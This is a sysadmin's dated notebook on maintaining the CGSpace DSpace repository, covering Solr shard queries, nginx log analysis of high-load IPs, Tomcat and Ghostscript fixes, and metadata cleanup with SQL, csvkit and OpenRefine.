+$ http 'http://localhost:3000/solr/statistics-2018/select?indent=on&rows=0&q=type:2+id:11576&fq=isBot:false&fq=statistics_type:view' | grep numFound
+<result name="response" numFound="241" start="0">
+
    +
  • I opened an issue on the GitHub issue tracker (#10)
  • +
  • I don’t think the SolrClient library we are currently using supports these types of queries so we might have to just do raw queries with requests
  • +
  • The pysolr library says it supports multicore indexes, but I am not sure it does (or at least not with our setup):
  • +
+
import pysolr
+solr = pysolr.Solr('http://localhost:3000/solr/statistics')
+results = solr.search('type:2', **{'fq': 'isBot:false AND statistics_type:view', 'facet': 'true', 'facet.field': 'id', 'facet.mincount': 1, 'facet.limit': 10, 'facet.offset': 0, 'rows': 0})
+print(results.facets['facet_fields'])
+{'id': ['77572', 646, '93185', 380, '92932', 375, '102499', 372, '101430', 337, '77632', 331, '102449', 289, '102485', 276, '100849', 270, '47080', 260]}
+
    +
  • If I double check one item from above, for example 77572, it appears this is only working on the current statistics core and not the shards:
  • +
+
import pysolr
+solr = pysolr.Solr('http://localhost:3000/solr/statistics')
+results = solr.search('type:2 id:77572', **{'fq': 'isBot:false AND statistics_type:view'})
+print(results.hits)
+646
+solr = pysolr.Solr('http://localhost:3000/solr/statistics-2018/')
+results = solr.search('type:2 id:77572', **{'fq': 'isBot:false AND statistics_type:view'})
+print(results.hits)
+595
+
    +
  • So I guess I need to figure out how to use join queries and maybe even switch to using raw Python requests with JSON
  • +
  • This enumerates the list of Solr cores and returns JSON format:
  • +
+
http://localhost:3000/solr/admin/cores?action=STATUS&wt=json
+
    +
  • I think I figured out how to search across shards, I needed to give the whole URL to each other core
  • +
  • Now I get more results when I start adding the other statistics cores:
  • +
+
$ http 'http://localhost:3000/solr/statistics/select?&indent=on&rows=0&q=*:*' | grep numFound
+<result name="response" numFound="2061320" start="0">
+$ http 'http://localhost:3000/solr/statistics/select?&shards=localhost:8081/solr/statistics-2018&indent=on&rows=0&q=*:*' | grep numFound
+<result name="response" numFound="16280292" start="0" maxScore="1.0">
+$ http 'http://localhost:3000/solr/statistics/select?&shards=localhost:8081/solr/statistics-2018,localhost:8081/solr/statistics-2017&indent=on&rows=0&q=*:*' | grep numFound
+<result name="response" numFound="25606142" start="0" maxScore="1.0">
+$ http 'http://localhost:3000/solr/statistics/select?&shards=localhost:8081/solr/statistics-2018,localhost:8081/solr/statistics-2017,localhost:8081/solr/statistics-2016&indent=on&rows=0&q=*:*' | grep numFound
+<result name="response" numFound="31532212" start="0" maxScore="1.0">
+
    +
  • I should be able to modify the dspace-statistics-api to check the shards via the Solr core status, then add the shards parameter to each query to make the search distributed among the cores
  • +
  • I implemented a proof of concept to query the Solr STATUS for active cores and to add them with a shards query string (a rough sketch of the approach follows the example queries below)
  • +
  • A few things I noticed: +
      +
    • Solr doesn’t mind if you use an empty shards parameter
    • +
    • Solr doesn’t mind if you have an extra comma at the end of the shards parameter
    • +
    • If you are searching multiple cores, you need to include the base core in the shards parameter as well
    • +
    • For example, compare the following two queries, first including the base core and the shard in the shards parameter, and then only including the shard:
    • +
    +
  • +
+
$ http 'http://localhost:8081/solr/statistics/select?indent=on&rows=0&q=type:2+id:11576&fq=isBot:false&fq=statistics_type:view&shards=localhost:8081/solr/statistics,localhost:8081/solr/statistics-2018' | grep numFound
+<result name="response" numFound="275" start="0" maxScore="12.205825">
+$ http 'http://localhost:8081/solr/statistics/select?indent=on&rows=0&q=type:2+id:11576&fq=isBot:false&fq=statistics_type:view&shards=localhost:8081/solr/statistics-2018' | grep numFound
+<result name="response" numFound="241" start="0" maxScore="12.205825">
+
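  • A rough sketch of that approach (not the actual proof of concept; it assumes Solr is reachable on localhost:8081 and uses the requests library):

#!/usr/bin/env python3
# Sketch: enumerate the Solr statistics cores via the cores STATUS API and
# build a "shards" parameter so that queries are distributed across all of them.
# Assumes Solr on localhost:8081; adjust for the real deployment.
import requests

SOLR = 'http://localhost:8081/solr'

def get_statistics_shards():
    # Ask Solr which cores are currently loaded
    res = requests.get(f'{SOLR}/admin/cores', params={'action': 'STATUS', 'wt': 'json'})
    cores = res.json()['status'].keys()
    # Keep the base statistics core plus the yearly shards (statistics-2018, etc.)
    statistics_cores = [c for c in cores if c.startswith('statistics')]
    # Solr wants host:port/solr/core, comma separated
    return ','.join(f'localhost:8081/solr/{core}' for core in statistics_cores)

def item_views(item_id):
    res = requests.get(f'{SOLR}/statistics/select', params={
        'q': f'type:2 id:{item_id}',
        'fq': ['isBot:false', 'statistics_type:view'],
        'rows': 0,
        'wt': 'json',
        'shards': get_statistics_shards(),
    })
    return res.json()['response']['numFound']

print(item_views(11576))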

2019-01-22

+
    +
  • Release version 0.9.0 of the dspace-statistics-api to address the issue of querying multiple Solr statistics shards
  • +
  • I deployed it on DSpace Test (linode19) and restarted the indexer and now it shows all the stats from 2018 as well (756 pages of views, instead of 6)
  • +
  • I deployed it on CGSpace (linode18) and restarted the indexer as well
  • +
  • Linode sent an alert that CGSpace (linode18) was using high CPU this afternoon, the top ten IPs during that time were:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "22/Jan/2019:1(4|5|6)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    155 40.77.167.106
+    176 2003:d5:fbda:1c00:1106:c7a0:4b17:3af8
+    189 107.21.16.70
+    217 54.83.93.85
+    310 46.174.208.142
+    346 83.103.94.48
+    360 45.5.186.2
+    595 154.113.73.30
+    716 196.191.127.37
+    915 35.237.175.180
+
    +
  • 35.237.175.180 is known to us
  • +
  • I don’t think we’ve seen 196.191.127.37 before. Its user agent is:
  • +
+
Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 UBrowser/7.0.185.1002 Safari/537.36
+
    +
  • Interestingly this IP is located in Addis Ababa…
  • +
  • Another interesting one is 154.113.73.30, which is apparently at IITA Nigeria and uses the user agent:
  • +
+
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
+
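  • For reference, a rough Python version of the same “top IPs in a time window” check (assuming the combined nginx log format; the paths and date pattern are the ones from the example above):

#!/usr/bin/env python3
# Sketch: count requests per client IP for a given date/hour pattern in the
# nginx access logs, like the zcat/awk/sort pipeline above.
import glob
import re
from collections import Counter

pattern = re.compile(r'22/Jan/2019:1[456]')
counts = Counter()

for path in glob.glob('/var/log/nginx/*.log') + glob.glob('/var/log/nginx/*.log.1'):
    with open(path, errors='replace') as f:
        for line in f:
            if pattern.search(line):
                # the client IP is the first field in the combined log format
                counts[line.split()[0]] += 1

for ip, count in counts.most_common(10):
    print(f'{count:>7} {ip}')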

2019-01-23

+
    +
  • Peter noticed that some goo.gl links in our tweets from Feedburner are broken, for example this one from last week:
  • +
+ + + +
    +
  • The shortened link is goo.gl/fb/VRj9Gq and it shows a “Dynamic Link not found” error from Firebase:
  • +
+

Dynamic Link not found

  • Apparently Google announced last year that they plan to discontinue the shortener and transition to Firebase Dynamic Links in March, 2019, so maybe this is related…
  • Very interesting discussion of methods for running Tomcat under systemd
  • We can set the ulimit options that used to be in /etc/default/tomcat7 with systemd’s LimitNOFILE and LimitAS (see the systemd.exec man page)
    • Note that we need to use infinity instead of unlimited for the address space
  • Create accounts for Bosun from IITA and Valerio from ICARDA / CGMEL on DSpace Test
  • Maria Garruccio asked me for a list of author affiliations from all of their submitted items so she can clean them up
  • I got a list of their collections from the CGSpace XMLUI and then used an SQL query to dump the unique values to CSV:
dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/35501', '10568/41728', '10568/49622', '10568/56589', '10568/56592', '10568/65064', '10568/65718', '10568/65719', '10568/67373', '10568/67731', '10568/68235', '10568/68546', '10568/69089', '10568/69160', '10568/69419', '10568/69556', '10568/70131', '10568/70252', '10568/70978'))) group by text_value order by count desc) to /tmp/bioversity-affiliations.csv with csv;
+COPY 1109
+
    +
  • Send a mail to the dspace-tech mailing list about the OpenSearch issue we had with the Livestock CRP
  • +
  • Linode sent an alert that CGSpace (linode18) had a high load this morning, here are the top ten IPs during that time:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "23/Jan/2019:0(4|5|6)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    222 54.226.25.74
+    241 40.77.167.13
+    272 46.101.86.248
+    297 35.237.175.180
+    332 45.5.184.72
+    355 34.218.226.147
+    404 66.249.64.155
+   4637 205.186.128.185
+   4637 70.32.83.92
+   9265 45.5.186.2
+
  • I think it’s the usual IPs:
    • 45.5.186.2 is CIAT
    • 70.32.83.92 is CCAFS
    • 205.186.128.185 is CCAFS or perhaps another Macaroni Bros harvester (new ILRI website?)
  • Following up on the thumbnail issue that we had in 2018-12
  • It looks like the two items with problematic PDFs both have thumbnails now:
  • Just to make sure these were not uploaded by the user or something, I manually forced the regeneration of these with DSpace’s filter-media:
$ schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace filter-media -v -f -i 10568/98390
+$ schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace filter-media -v -f -i 10568/98391
+
+

2019-01-24

+
    +
  • I noticed Ubuntu’s Ghostscript 9.26 works on some troublesome PDFs where Arch’s Ghostscript 9.26 doesn’t, so the fix for the first/last page crash is not the patch I found yesterday
  • +
  • Ubuntu’s Ghostscript uses another patch from Ghostscript git (upstream bug report)
  • +
  • I re-compiled Arch’s ghostscript with the patch and then I was able to generate a thumbnail from one of the troublesome PDFs
  • +
  • Before and after:
  • +
+
$ identify Food\ safety\ Kenya\ fruits.pdf\[0\]
+zsh: abort (core dumped)  identify Food\ safety\ Kenya\ fruits.pdf\[0\]
+$ identify Food\ safety\ Kenya\ fruits.pdf\[0\]
+Food safety Kenya fruits.pdf[0]=>Food safety Kenya fruits.pdf PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.000u 0:00.000
+identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/1747.
+
    +
  • I reported it to the Arch Linux bug tracker (61513)
  • +
  • I told Atmire to go ahead with the Metadata Quality Module addition based on our 5_x-dev branch (657)
  • +
  • Linode sent alerts last night to say that CGSpace (linode18) was using high CPU last night, here are the top ten IPs from the nginx logs around that time:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "23/Jan/2019:(18|19|20)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    305 3.81.136.184
+    306 3.83.14.11
+    306 52.54.252.47
+    325 54.221.57.180
+    378 66.249.64.157
+    424 54.70.40.11
+    497 47.29.247.74
+    783 35.237.175.180
+   1108 66.249.64.155
+   2378 45.5.186.2
+
    +
  • 45.5.186.2 is CIAT and 66.249.64.155 is Google… hmmm.
  • +
  • Linode sent another alert this morning, here are the top ten IPs active during that time:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "24/Jan/2019:0(4|5|6)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    360 3.89.134.93
+    362 34.230.15.139
+    366 100.24.48.177
+    369 18.212.208.240
+    377 3.81.136.184
+    404 54.221.57.180
+    506 66.249.64.155
+   4642 70.32.83.92
+   4643 205.186.128.185
+   8593 45.5.186.2
+
    +
  • Just double checking what CIAT is doing, they are mainly hitting the REST API:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "24/Jan/2019:" | grep 45.5.186.2 | grep -Eo "GET /(handle|bitstream|rest|oai)/" | sort | uniq -c | sort -n
+
+

2019-01-25

+
    +
  • A little bit more work on getting Tomcat to run from a tarball on our Ansible infrastructure playbooks +
      +
    • I tested by doing a Tomcat 7.0.91 installation, then switching it to 7.0.92 and it worked… nice!
    • +
    • I refined the tasks so much that I was confident enough to deploy them on DSpace Test and it went very well
    • +
    • Basically I just stopped tomcat7, created a dspace user, removed tomcat7, chown’d everything to the dspace user, then ran the playbook
    • +
    • So now DSpace Test (linode19) is running Tomcat 7.0.92… w00t
    • +
    • Now we need to monitor it for a few weeks to see if there is anything we missed, and then I can change CGSpace (linode18) as well, and we’re ready for Ubuntu 18.04 too!
    • +
    +
  • +
+

2019-01-27

+
    +
  • Linode sent an email that the server was using a lot of CPU this morning, and these were the top IPs in the web server logs at the time:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "27/Jan/2019:0(6|7|8)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    189 40.77.167.108
+    191 157.55.39.2
+    263 34.218.226.147
+    283 45.5.184.2
+    332 45.5.184.72
+    608 5.9.6.51
+    679 66.249.66.223
+   1116 66.249.66.219
+   4644 205.186.128.185
+   4644 70.32.83.92
+
    +
  • I think it’s the usual IPs: +
      +
    • 70.32.83.92 is CCAFS
    • +
    • 205.186.128.185 is CCAFS or perhaps another Macaroni Bros harvester (new ILRI website?)
    • +
    +
  • +
+

2019-01-28

+
    +
  • Udana from WLE asked me about the interaction between their publication website and their items on CGSpace +
      +
    • There is an item that is mapped into their collection from IWMI and is missing their cg.identifier.wletheme metadata
    • +
    • I told him that, as far as I remember, when WLE introduced Phase II research themes in 2017 we decided to infer theme ownership from the collection hierarchy and we created a WLE Phase II Research Themes subCommunity
    • +
    • Perhaps they need to ask Macaroni Bros about the mapping
    • +
    +
  • +
  • Linode alerted that CGSpace (linode18) was using too much CPU again this morning, here are the active IPs from the web server log at the time:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "28/Jan/2019:0(6|7|8)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+     67 207.46.13.50
+    105 41.204.190.40
+    117 34.218.226.147
+    126 35.237.175.180
+    203 213.55.99.121
+    332 45.5.184.72
+    377 5.9.6.51
+    512 45.5.184.2
+   4644 205.186.128.185
+   4644 70.32.83.92
+
    +
  • There seems to be a pattern with 70.32.83.92 and 205.186.128.185 lately!
  • +
  • Every morning at 8AM they are the top users… I should tell them to stagger their requests…
  • +
  • I signed up for a VisualPing of the PostgreSQL JDBC driver download page to my CGIAR email address +
      +
    • Hopefully this will one day alert me that a new driver is released!
    • +
    +
  • +
  • Last night Linode sent an alert that CGSpace (linode18) was using high CPU, here are the most active IPs in the hours just before, during, and after the alert:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "28/Jan/2019:(17|18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    310 45.5.184.2
+    425 5.143.231.39
+    526 54.70.40.11
+   1003 199.47.87.141
+   1374 35.237.175.180
+   1455 5.9.6.51
+   1501 66.249.66.223
+   1771 66.249.66.219
+   2107 199.47.87.140
+   2540 45.5.186.2
+
    +
  • Of course there is CIAT’s 45.5.186.2, but also 45.5.184.2 appears to be CIAT… I wonder why they have two harvesters?
  • +
  • 199.47.87.140 and 199.47.87.141 are TurnItIn with the following user agent:
  • +
+
TurnitinBot (https://turnitin.com/robot/crawlerinfo.html)
+

2019-01-29

+
    +
  • Linode sent an alert about CGSpace (linode18) CPU usage this morning, here are the top IPs in the web server logs just before, during, and after the alert:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "29/Jan/2019:0(3|4|5|6|7)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    334 45.5.184.72
+    429 66.249.66.223
+    522 35.237.175.180
+    555 34.218.226.147
+    655 66.249.66.221
+    844 5.9.6.51
+   2507 66.249.66.219
+   4645 70.32.83.92
+   4646 205.186.128.185
+   9329 45.5.186.2
+
    +
  • 45.5.186.2 is CIAT as usual…
  • +
  • 70.32.83.92 and 205.186.128.185 are CCAFS as usual…
  • +
  • 66.249.66.219 is Google…
  • +
  • I’m thinking it might finally be time to increase the threshold of the Linode CPU alerts +
      +
    • I adjusted the alert threshold from 250% to 275%
    • +
    +
  • +
+

2019-01-30

+
    +
  • Got another alert from Linode about CGSpace (linode18) this morning, here are the top IPs before, during, and after the alert:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "30/Jan/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    273 46.101.86.248
+    301 35.237.175.180
+    334 45.5.184.72
+    387 5.9.6.51
+    527 2a01:4f8:13b:1296::2
+   1021 34.218.226.147
+   1448 66.249.66.219
+   4649 205.186.128.185
+   4649 70.32.83.92
+   5163 45.5.184.2
+
    +
  • I might need to adjust the threshold again, because the load average this morning was 296% and the activity looks pretty normal (as always recently)
  • +
+

2019-01-31

+
    +
  • Linode sent alerts about CGSpace (linode18) last night and this morning, here are the top IPs before, during, and after those times:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "30/Jan/2019:(16|17|18|19|20)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    436 18.196.196.108
+    460 157.55.39.168
+    460 207.46.13.96
+    500 197.156.105.116
+    728 54.70.40.11
+   1560 5.9.6.51
+   1562 35.237.175.180
+   1601 85.25.237.71
+   1894 66.249.66.219
+   2610 45.5.184.2
+# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "31/Jan/2019:0(2|3|4|5|6)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    318 207.46.13.242
+    334 45.5.184.72
+    486 35.237.175.180
+    609 34.218.226.147
+    620 66.249.66.219
+   1054 5.9.6.51
+   4391 70.32.83.92
+   4428 205.186.128.185
+   6758 85.25.237.71
+   9239 45.5.186.2
+
    +
  • 45.5.186.2 and 45.5.184.2 are CIAT as always
  • +
  • 85.25.237.71 is some new server in Germany that I’ve never seen before with the user agent:
  • +
+
Linguee Bot (http://www.linguee.com/bot; bot@linguee.com)
+

February, 2019

+ +
+

2019-02-01

+
    +
  • Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!
  • +
  • The top IPs before, during, and after this latest alert tonight were:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "01/Feb/2019:(17|18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    245 207.46.13.5
+    332 54.70.40.11
+    385 5.143.231.38
+    405 207.46.13.173
+    405 207.46.13.75
+   1117 66.249.66.219
+   1121 35.237.175.180
+   1546 5.9.6.51
+   2474 45.5.186.2
+   5490 85.25.237.71
+
    +
  • 85.25.237.71 is the “Linguee Bot” that I first saw last month
  • +
  • The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase
  • +
  • There were just over 3 million accesses in the nginx logs last month:
  • +
+
# time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2019"
+3018243
+
+real    0m19.873s
+user    0m22.203s
+sys     0m1.979s
+
+

2019-02-02

+
    +
  • Another alert from Linode about CGSpace (linode18) this morning, here are the top IPs in the web server logs before, during, and after that time:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Feb/2019:0(1|2|3|4|5)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    284 18.195.78.144
+    329 207.46.13.32
+    417 35.237.175.180
+    448 34.218.226.147
+    694 2a01:4f8:13b:1296::2
+    718 2a01:4f8:140:3192::2
+    786 137.108.70.14
+   1002 5.9.6.51
+   6077 85.25.237.71
+   8726 45.5.184.2
+
    +
  • 45.5.184.2 is CIAT and 85.25.237.71 is the new Linguee bot that I first noticed a few days ago
  • +
  • I will increase the Linode alert threshold from 275 to 300% because this is becoming too much!
  • +
  • I tested the Atmire Metadata Quality Module (MQM)’s duplicate checker on some WLE items that I helped Udana with a few months ago on DSpace Test (linode19) and indeed it found many duplicates!
  • +
+

2019-02-03

+
    +
  • This is seriously getting annoying, Linode sent another alert this morning that CGSpace (linode18) load was 377%!
  • +
  • Here are the top IPs before, during, and after that time:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    325 85.25.237.71
+    340 45.5.184.72
+    431 5.143.231.8
+    756 5.9.6.51
+   1048 34.218.226.147
+   1203 66.249.66.219
+   1496 195.201.104.240
+   4658 205.186.128.185
+   4658 70.32.83.92
+   4852 45.5.184.2
+
    +
  • 45.5.184.2 is CIAT, 70.32.83.92 and 205.186.128.185 are Macaroni Bros harvesters for CCAFS I think
  • +
  • 195.201.104.240 is a new IP address in Germany with the following user agent:
  • +
+
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:62.0) Gecko/20100101 Firefox/62.0
+
    +
  • This user was making 20–60 requests per minute this morning… seems like I should try to block this type of behavior heuristically, regardless of user agent!
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Feb/2019" | grep 195.201.104.240 | grep -o -E '03/Feb/2019:0[0-9]:[0-9][0-9]' | uniq -c | sort -n | tail -n 20
+     19 03/Feb/2019:07:42
+     20 03/Feb/2019:07:12
+     21 03/Feb/2019:07:27
+     21 03/Feb/2019:07:28
+     25 03/Feb/2019:07:23
+     25 03/Feb/2019:07:29
+     26 03/Feb/2019:07:33
+     28 03/Feb/2019:07:38
+     30 03/Feb/2019:07:31
+     33 03/Feb/2019:07:35
+     33 03/Feb/2019:07:37
+     38 03/Feb/2019:07:40
+     43 03/Feb/2019:07:24
+     43 03/Feb/2019:07:32
+     46 03/Feb/2019:07:36
+     47 03/Feb/2019:07:34
+     47 03/Feb/2019:07:39
+     47 03/Feb/2019:07:41
+     51 03/Feb/2019:07:26
+     59 03/Feb/2019:07:25
+
    +
  • At least they re-used their Tomcat session!
  • +
+
$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=195.201.104.240' dspace.log.2019-02-03 | sort | uniq | wc -l
+1
+
    +
  • This user was making requests to /browse, which is not currently under the existing rate limiting of dynamic pages in our nginx config
  • +
  • Run all system updates on linode20 and reboot it +
      +
    • This will be the new AReS repository explorer server soon
    • +
    +
  • +
+

2019-02-04

+
    +
  • Generate a list of CTA subjects from CGSpace for Peter:
  • +
+
dspace=# \copy (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=124 GROUP BY text_value ORDER BY COUNT DESC) to /tmp/cta-subjects.csv with csv header;
+COPY 321
+
    +
  • Skype with Michael Victor about CKM and CGSpace
  • +
  • Discuss the new IITA research theme field with Abenet and decide that we should use cg.identifier.iitatheme
  • +
  • This morning there was another alert from Linode about the high load on CGSpace (linode18), here are the top IPs in the web server logs before, during, and after that time:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "04/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    589 2a01:4f8:140:3192::2
+    762 66.249.66.219
+    889 35.237.175.180
+   1332 34.218.226.147
+   1393 5.9.6.51
+   1940 50.116.102.77
+   3578 85.25.237.71
+   4311 45.5.184.2
+   4658 205.186.128.185
+   4658 70.32.83.92
+
    +
  • At this rate I think I just need to stop paying attention to these alerts—DSpace gets thrashed when people use the APIs properly and there’s nothing we can do to improve REST API performance!
  • +
  • Perhaps I just need to keep increasing the Linode alert threshold (currently 300%) for this host?
  • +
+

2019-02-05

+
    +
  • Peter sent me corrections and deletions for the CTA subjects and as usual, there were encoding errors with some accents in his file
  • +
  • In other news, it seems that the GREL syntax regarding booleans changed in OpenRefine recently, so I need to update some expressions like the one I use to detect encoding errors to use toString():
  • +
+
or(
+  isNotNull(value.match(/.*\uFFFD.*/)),
+  isNotNull(value.match(/.*\u00A0.*/)),
+  isNotNull(value.match(/.*\u200A.*/)),
+  isNotNull(value.match(/.*\u2019.*/)),
+  isNotNull(value.match(/.*\u00b4.*/)),
+  isNotNull(value.match(/.*\u007e.*/))
+).toString()
+
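  • The same check is easy to run outside OpenRefine too; a small sketch (assuming a one-column CSV of values to test) that flags the same characters as the GREL above:

#!/usr/bin/env python3
# Sketch: print metadata values that contain characters which usually indicate
# encoding problems (the same characters matched by the GREL expression above).
import csv
import sys

SUSPICIOUS = {
    '\ufffd': 'REPLACEMENT CHARACTER',
    '\u00a0': 'NO-BREAK SPACE',
    '\u200a': 'HAIR SPACE',
    '\u2019': 'RIGHT SINGLE QUOTATION MARK',
    '\u00b4': 'ACUTE ACCENT',
    '\u007e': 'TILDE',
}

with open(sys.argv[1], newline='') as f:
    for row in csv.reader(f):
        for value in row:
            hits = [name for char, name in SUSPICIOUS.items() if char in value]
            if hits:
                print(f'{value}: {", ".join(hits)}')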
+
$ ./fix-metadata-values.py -i 2019-02-04-Correct-65-CTA-Subjects.csv -f cg.subject.cta -t CORRECT -m 124 -db dspace -u dspace -p 'fuu' -d
+$ ./delete-metadata-values.py -i 2019-02-04-Delete-16-CTA-Subjects.csv -f cg.subject.cta -m 124 -db dspace -u dspace -p 'fuu' -d
+
    +
  • I applied them on DSpace Test and CGSpace and started a full Discovery re-index:
  • +
+
$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
+$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
    +
  • Peter had marked several terms with || to indicate multiple values in his corrections so I will have to go back and do those manually:
  • +
+
EMPODERAMENTO DE JOVENS,EMPODERAMENTO||JOVENS
+ENVIRONMENTAL PROTECTION AND NATURAL RESOURCES MANAGEMENT,NATURAL RESOURCES MANAGEMENT||ENVIRONMENT
+FISHERIES AND AQUACULTURE,FISHERIES||AQUACULTURE
+MARKETING AND TRADE,MARKETING||TRADE
+MARKETING ET COMMERCE,MARKETING||COMMERCE
+NATURAL RESOURCES AND ENVIRONMENT,NATURAL RESOURCES MANAGEMENT||ENVIRONMENT
+PÊCHES ET AQUACULTURE,PÊCHES||AQUACULTURE
+PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
+

2019-02-06

+
    +
  • I dumped the CTA community so I can try to fix the subjects with multiple subjects that Peter indicated in his corrections:
  • +
+
$ dspace metadata-export -i 10568/42211 -f /tmp/cta.csv
+
    +
  • Then I used csvcut to get only the CTA subject columns:
  • +
+
$ csvcut -c "id,collection,cg.subject.cta,cg.subject.cta[],cg.subject.cta[en_US]" /tmp/cta.csv > /tmp/cta-subjects.csv
+
    +
  • After that I imported the CSV into OpenRefine where I could properly identify and edit the subjects as multiple values
  • +
  • Then I imported it back into CGSpace:
  • +
+
$ dspace metadata-import -f /tmp/2019-02-06-CTA-multiple-subjects.csv
+
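  • For reference, the OpenRefine step could also be scripted; a rough sketch (assuming a corrections CSV with old,new columns like the list above, and the csvcut output shown earlier):

#!/usr/bin/env python3
# Sketch: apply "old,new" subject corrections (where the new value may contain
# several subjects separated by ||) to a DSpace metadata export CSV so it can
# be re-imported with dspace metadata-import.
import csv
import sys

corrections_file, metadata_file, output_file = sys.argv[1:4]

with open(corrections_file, newline='') as f:
    corrections = {old: new for old, new in csv.reader(f)}

with open(metadata_file, newline='') as fin, open(output_file, 'w', newline='') as fout:
    reader = csv.DictReader(fin)
    writer = csv.DictWriter(fout, fieldnames=reader.fieldnames)
    writer.writeheader()
    for row in reader:
        for field in reader.fieldnames:
            if field.startswith('cg.subject.cta') and row.get(field):
                # a cell may already hold several values separated by ||
                values = [corrections.get(v, v) for v in row[field].split('||')]
                row[field] = '||'.join(values)
        writer.writerow(row)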
    +
  • Another day, another alert about high load on CGSpace (linode18) from Linode
  • +
  • This time the load average was 370% and the top ten IPs before, during, and after that time were:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "06/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    689 35.237.175.180
+   1236 5.9.6.51
+   1305 34.218.226.147
+   1580 66.249.66.219
+   1939 50.116.102.77
+   2313 108.212.105.35
+   4666 205.186.128.185
+   4666 70.32.83.92
+   4950 85.25.237.71
+   5158 45.5.186.2
+
    +
  • Looking closer at the top users, I see 45.5.186.2 is in Brazil and was making over 100 requests per minute to the REST API:
  • +
+
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep 45.5.186.2 | grep -o -E '06/Feb/2019:0[0-9]:[0-9][0-9]' | uniq -c | sort -n | tail -n 10
+    118 06/Feb/2019:05:46
+    119 06/Feb/2019:05:37
+    119 06/Feb/2019:05:47
+    120 06/Feb/2019:05:43
+    120 06/Feb/2019:05:44
+    121 06/Feb/2019:05:38
+    122 06/Feb/2019:05:39
+    125 06/Feb/2019:05:42
+    126 06/Feb/2019:05:40
+    126 06/Feb/2019:05:41
+
    +
  • I was thinking of rate limiting those because I assumed most of them would be errors, but actually most are HTTP 200 OK!
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E '06/Feb/2019' | grep 45.5.186.2 | awk '{print $9}' | sort | uniq -c
+  10411 200
+      1 301
+      7 302
+      3 404
+     18 499
+      2 500
+
    +
  • I should probably start looking at the top IPs for web (XMLUI) and for API (REST and OAI) separately:
  • +
+
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "06/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    328 220.247.212.35
+    372 66.249.66.221
+    380 207.46.13.2
+    519 2a01:4f8:140:3192::2
+    572 5.143.231.8
